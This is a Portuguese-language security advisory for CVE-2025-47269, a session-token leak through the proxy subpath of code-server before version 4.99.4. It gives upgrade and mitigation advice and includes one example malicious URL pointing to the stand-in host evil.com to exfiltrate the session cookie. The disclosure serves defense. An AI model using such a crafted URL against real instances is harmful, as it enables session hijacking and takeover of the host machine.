CVE-2025-47269

Nome do Software Vulnerável e Versões Afetadas Versões do code-server anteriores à 4.99.4

Descrição A vulnerabilidade permite que um atacante obtenha acesso ao token de sessão por meio de uma URL maliciosamente elaborada utilizando o subcaminho de proxy. Isso pode resultar no atacante utilizando o proxy para acessar um domínio arbitrário, potencialmente exfiltrando o token de sessão de um usuário. A URL maliciosa, por exemplo https://<code-server>/proxy/test@evil.com/path, seria encaminhada via proxy para test@evil.com/path. Com acesso ao cookie de sessão, o atacante pode fazer login no code-server e obter acesso completo à máquina que hospeda o code-server, com os privilégios do usuário que executa o code-server.

Recomendações Para versões anteriores à 4.99.4, atualize para a versão 4.99.4 para resolver o problema. Como medida paliativa temporária, considere desabilitar o proxy integrado até que uma correção esteja disponível. Restrinja o acesso ao subcaminho de proxy para minimizar o risco de exploração. Evite clicar em links maliciosamente elaborados que façam referência ao subcaminho /proxy em instâncias do code-server.